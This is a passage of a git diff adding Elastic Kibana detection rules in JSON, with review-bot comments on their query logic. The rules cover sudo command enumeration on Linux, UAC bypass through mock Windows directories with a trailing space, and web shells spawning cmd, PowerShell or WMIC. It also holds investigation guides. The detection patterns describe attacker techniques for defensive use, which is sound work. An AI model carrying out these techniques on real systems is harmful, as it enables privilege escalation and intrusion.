"reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "28bc620d-b2f7-4132-b372-f77953881d05_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json new file mode 100644 index 00000000000..1065e63c1e5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json 
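Review bot: `description` states the connection is initiated by "UID/GID 0 (root)", but the second sequence step checks only `user.id == "0"`; no group field appears in `query` or in `required_fields`. Either drop "/GID" from the description, or, if the group id is meant to be part of the match, add the corresponding group condition and its `required_fields` entry. The first step's `user.id != "0"` also deliberately excludes gdb already running as root; stating that scoping in the description would save readers from assuming it is an oversight.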
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Sudo Command Enumeration Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"sudo\" and process.args == \"-l\" and process.args_count == 2 and\nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \nnot group.Ext.real.id : \"0\" and not user.Ext.real.id : \"0\" and not process.args == \"dpkg\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "28d39238-0c01-420a-b77a-24e5a7378663", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "28d39238-0c01-420a-b77a-24e5a7378663_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json new file mode 100644 index 00000000000..ea973f5f6e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json 
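Review bot: In `query`, the trailing `and not process.args == "dpkg"` is dead: `process.args_count == 2` together with `process.args == "-l"` already fixes the argument vector to `sudo -l`, and `process.name == "sudo"` rules out the binary itself being `dpkg`, so no matching event can carry that argument. Either remove the clause or, if it was meant to exclude a package-manager wrapper, express that on `process.parent.name`, which is already restricted to interactive shells. `required_fields` also lists `group.Ext.real.id` and `user.Ext.real.id` as `"type": "unknown"` while the query compares them as strings; declaring the mapped type would keep the metadata consistent with the other entries.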
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Windows Directory Masquerading", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", + "references": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + 
"threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "290aca65-e94d-403b-ba0f-62f320e63f51_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json new file mode 100644 index 00000000000..ff0dfef8bf3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Windows Directory Masquerading", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", + "references": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + 
"threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "290aca65-e94d-403b-ba0f-62f320e63f51_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json new file mode 100644 index 00000000000..9bcb157abe5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_110.json 
@@ -0,0 +1,166 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access.", + "false_positives": [ + "Security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Web Shell Detection: Script Process Child of Common Web Processes", + "note": "## Triage and analysis\n\n### Investigating Web Shell Detection: Script Process Child of Common Web Processes\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. 
A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server.\n\nThis rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes.\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\") and\n not \n (\n process.parent.name : (\"php.exe\", \"httpd.exe\") and process.name : \"cmd.exe\" and\n process.command_line : (\n \"cmd.exe /c mode CON\",\n \"cmd.exe /s /c \\\"mode CON\\\"\",\n \"cmd.exe /c \\\"mode\\\"\",\n \"cmd.exe /s /c \\\"tput colors 2>&1\\\"\"\n )\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"2917d495-59bd-4250-b395-c29409b76086", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": 
"https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2917d495-59bd-4250-b395-c29409b76086_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json new file mode 100644 index 00000000000..7b325998706 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_111.json 
@@ -0,0 +1,166 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access.", + "false_positives": [ + "Security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Web Shell Detection: Script Process Child of Common Web Processes", + "note": "## Triage and analysis\n\n### Investigating Web Shell Detection: Script Process Child of Common Web Processes\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. 
A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server.\n\nThis rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes.\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
